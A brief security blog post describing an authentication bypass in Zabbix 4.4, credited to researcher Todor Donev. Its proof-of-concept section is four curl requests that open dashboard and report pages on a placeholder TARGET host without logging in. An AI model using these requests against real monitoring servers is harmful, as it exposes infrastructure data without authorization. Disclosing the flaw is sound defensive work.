Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines (VMs) and cloud services. Zabbix provides monitoring metrics, among others network utilization, CPU load and disk space consumption.

Security researcher Todor Donev has been found in the popular system monitoring application Zabbix. Enabling a third party to bypass authentication. Zabbix is a very popular monitoring software for monitoring availability for computer hosts, Most commonly used by internet service providers and software companies. The vulnerability has found in Zabbix 4.4. The vulnerability has been given the CVE of CVE-2019-15943.

Proof of concept

curl -i https://TARGET/zabbix/zabbix.php?action=dashboard.list
curl -i https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
curl -i https://TARGET/zabbix/screens.php?ddreset=1
curl -i https://TARGET/zabbix/report2.php?ddreset=1

Video

Follow us
LinkedIn : Rapidsafeguard
Twitter : Rapidsafeguard
Instagram: Rapidsafeguard
Facebook : Theeasyhack
YouTube : Rapidsafeguard

LEAVE A REPLY

Please enter your comment!
Please enter your name here